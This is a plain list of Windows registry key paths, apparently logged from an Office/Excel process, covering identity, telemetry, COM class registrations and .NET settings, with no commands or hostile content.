HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000478
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000478\{409C8376-007B-4357-AE8E-26316EE3FB0D}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000478\{409C8376-007B-4357-AE8E-26316EE3FB0D}\Enable
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\LanguageProfile\0x0000FFFF
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\LanguageProfile\0x0000FFFF\{F2510000-2FC8-4EB3-A41A-CCE5F08541E6}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\LanguageProfile\0x0000FFFF\{F2510000-2FC8-4EB3-A41A-CCE5F08541E6}\Enable
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{F89E9E58-BD2F-4008-9AC2-0F816C09F4EE}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{F89E9E58-BD2F-4008-9AC2-0F816C09F4EE}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x0000FFFF
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x0000FFFF\{38445657-9381-11D6-B41A-00065B83EE53}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x0000FFFF\{38445657-9381-11D6-B41A-00065B83EE53}\Enable
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\UseOfficeUIFont
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Options\AirspaceDisable
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\FontInfoCache
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common\ClientTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\DisableTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteTelemetryEventsToNexus
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Identity
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\DisableOneAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\EnableExchangeOnPremModernAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\DisableAuthentication
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\EnableADAL
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ServiceAuthInfoCache\LiveIdServerToServiceParams
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ServiceAuthInfoCache\SpoServerToServiceParams
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ServiceAuthInfoCache\ADALServerToServiceParams
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ServiceAuthInfoCache\AadServerToServiceParams
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ServiceAuthInfoCache\AuthContextToServiceParams
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ServiceAuthInfoCache\BadgerServerToServiceParams
HKEY_LOCAL_MACHINE\Software\Microsoft\IdentityCRL
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ServiceEnvironment
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\ONetConfig
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ONetConfig
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ONetConfig
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ScriptRun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ScriptRun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ScriptRun\IdentityRun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\Canary
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\NoDomainUser
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\FederationSignInName
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3\Com+Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\FederationProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\FederationConfigError
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\Identities
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ServiceAuthInfoCache\CredStoreKeyToAuthScheme
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\GELPrefs
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\GELPrefs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\SYSTEM\CurrentControlSet\Control\Session Manager
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\LocalServer
HKEY_CURRENT_USER\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\Elevation
HKEY_USERS\S-1-5-21-932793227-1321892499-785312009-1001_Classes
HKEY_LOCAL_MACHINE\Software\Classes
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\FontCache\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FontCache\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FontCache\Parameters\ClientCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\DisableAADWAM
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\Profiles
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\msoridShouldUseReauthRequestProxy
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\SpoAuthenticatorHeaderEnabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\IsOnRequestCompletedActivityEnabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\DisableMSAWAM
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ScriptRun\OLicenseCleanup
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ConnectedAccountWamAad
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ConnectedAccountCID
HKEY_CURRENT_USER\Software\Policies\Microsoft\Security
HKEY_CURRENT_USER\Software\Microsoft\Security
HKEY_CLASSES_ROOT\CLSID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{dcb00c01-570f-4a9b-8d69-199fdba5723b}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{dcb00c01-570f-4a9b-8d69-199fdba5723b}\InsecureQI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\System\Setup
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\System\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Classes\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\AppID
HKEY_CURRENT_USER\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\LocalService
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\ServiceParameters
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\RunAs
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\ActivateAtStorage
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\ROTFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\AppIDFlags
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\MGOTFlags
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\LaunchPermission
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\LegacyAuthenticationLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\LegacyImpersonationLevel
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\SRPTrustLevel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\RemoteServerName
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\DllSurrogate
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Upgrades
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\Policy\Upgrades
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\ErrorDialog
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\Fod
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\FodConservativeMode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Security\AutomationSecurity
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Research\Translation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\CurrentProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\MaxWords
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\MaxWordsJapan
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\UseOnline
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\PreferOffline
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\UseMT
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\UseOnlineContent
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Logging
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Logging
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\EnablePhoneOnlyAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\ConfigEnvironment
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16924&crev=3
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16924&crev=3\0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16924&crev=3\0\Url
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16924&crev=3\0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16924&crev=3\0\StartDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16924&crev=3\0\FilePath
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\TelemetryClientId
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\QMEnable
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\ClientTelemetry\ViewerSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\ViewerSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\SessionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\EnableOfficeBetaHeader
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\EnableHttpAccessTypeAutomaticProxy
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DisableConnectionReuse
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ClientTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesXmlDir
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\excel.exe_queried
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\excel.exe_expiration
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ClientTelemetry\Debug
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\Debug
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteRulesResultToAsimov
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteRulesResultToFile
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\ULSQueueAbortThreshold
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\DeferredConfigs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\TrustCenter\Experimentation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation\DisableFeatureRollout
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\BuildNumber
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling\ClientSamplingOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableTelemetryGrf
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DisableServerReachability
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\Roaming
HKEY_CURRENT_USER\Software\Policies\Policies\Microsoft\Office\16.0\Common\Roaming
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Roaming
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\SchemaVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\LicensingNext
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\Licensing
HKEY_CURRENT_USER\Software\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\Common\Licensing
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocHandler
